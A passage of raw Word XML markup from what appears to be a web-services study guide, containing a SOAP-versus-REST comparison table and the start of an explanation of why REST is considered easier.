          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6BCB20DB"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bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AB84FD1"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SOAP is a protocol with a set of rules for exchanging messages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BDAF23F"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REST is an architectural style, not a protocol, typically using HTTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="37A81422" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72E3B456"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bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Message Format</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="248A2A26"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SOAP uses XML format for messages, which is strictly defined.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="637FC4A7"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REST uses multiple formats like JSON, XML, HTML, or plain text.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="10E925FD" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4619318C"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bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>State</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F8E8F7D"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SOAP can be either stateful or stateless.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B23A121"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REST is stateless, meaning each request must contain all information for processing.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="256EDD32" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B631AD3"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bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0408E82C"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SOAP operates over multiple protocols like HTTP, SMTP, TCP, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64BF9974"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REST operates only over HTTP/HTTPS protocols.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="232B09C4" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="292889C7"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bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="133A5D21"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SOAP has higher overhead due to its strict standards and XML-based messaging.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4113798E"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REST is lightweight and faster due to its simple, text-based data formats like JSON.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="08794B54" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45225B20"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bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="520EB9EF"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SOAP has built-in security (WS-Security) for message integrity and confidentiality.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19FFE177"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REST relies on underlying protocols (e.g., HTTPS) for security.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="50A12324" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="304B98BA"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bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Transactions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F2EEEC9"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SOAP supports ACID-compliant transactions and complex messaging.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="268B7F58"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REST does not support built-in transactions.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="5F44A618" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50CE038E"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bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Error Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A6B3282"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SOAP has a built-in error handling mechanism (fault elements in XML).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D7D697C"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REST uses standard HTTP status codes (e.g., 404, 500) for error handling.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="7F5DCEAF" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67A4BDB5"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bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Complexity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="360EC489"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SOAP is more complex and requires more setup.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F96984E"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REST is simple and easy to implement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="30EB795B" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4CCF1492"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bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Caching</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F550EC3"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SOAP does not support caching as it typically uses complex operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D2433FE"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REST supports caching as it can take advantage of HTTP caching mechanisms.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006529AB" w:rsidRPr="00CE4B95" w14:paraId="0E4ADCF7" w14:textId="77777777" w:rsidTr="002A079D">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="549B68FB"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bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Use Cases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6917459D"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SOAP is best suited for enterprise-level applications, banking, payment gateways, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CD68F79" w14:textId="77777777" w:rsidR="002A079D" w:rsidRPr="00CE4B95" w:rsidRDefault="002A079D" w:rsidP="006529AB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>REST is ideal for web services, mobile apps, and web APIs with simple CRUD operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="690BB88F" w14:textId="77777777" w:rsidR="002A079D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="006529AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="08D9C893">
          <v:rect id="_x0000_i1961" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B43512" w14:textId="77777777" w:rsidR="002A079D" w:rsidRPr="00CE4B95" w:rsidRDefault="002A079D" w:rsidP="006529AB">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7964B553" w14:textId="77777777" w:rsidR="002A079D" w:rsidRPr="00CE4B95" w:rsidRDefault="002A079D" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1775"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SOAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a protocol with strict standards, uses XML, and is suited for complex, transactional, and secure services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278D1D6E" w14:textId="77777777" w:rsidR="002A079D" w:rsidRPr="00CE4B95" w:rsidRDefault="002A079D" w:rsidP="00207084">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1775"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>REST</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an architectural style that uses simple HTTP methods and is ideal for lightweight, stateless, and scalable web services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BA2BF0" w14:textId="25281183" w:rsidR="00631ACD" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00631AC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426877A">
          <v:rect id="_x0000_i1962" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5BF107" w14:textId="10F8EB59" w:rsidR="009E74CB" w:rsidRPr="00CE4B95" w:rsidRDefault="00C75E3C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="399" w:name="_Toc196307879"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Which among SOAP and REST is easy</w:t>
      </w:r>
      <w:r w:rsidR="009E74CB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="399"/>
    </w:p>
    <w:p w14:paraId="46AE6FE8" w14:textId="1E74BD5C" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6" w:rsidP="00585961">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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REST</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is generally considered </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>easier</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> than </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SOAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for the following reasons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D07FF5C" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6"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1. Simplicity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DC2B5D" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177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REST</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is lightweight and uses simple HTTP methods (GET, POST, PUT, DELETE) for operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67785870" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177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It typically uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is more compact and easier to work with than </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> used by SOAP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE5AFBC" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177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REST does not require strict message structure or complex headers, making it easier to implement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C937A1E" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6"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2. Ease of Use:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C09AED" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1777"/>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REST</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> APIs are easier to understand and implement, especially for web services and mobile apps.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5804619E" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1777"/>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OAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> requires additional standards (such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WSDL</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WS-Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>XML schema</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>), which can make it more difficult to set up and maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B21DD57" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6"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3. Learning Curve:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D351E83" w14:textId="77777777" w:rsidR="00DB72A6" w:rsidRPr="00585961" w:rsidRDefault="00DB72A6" w:rsidP="00585961">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1778"/>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REST has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>shorter learning curve</w:t>
      </w:r>
      <w:r w:rsidRPr="00585961">
        <w:rPr>
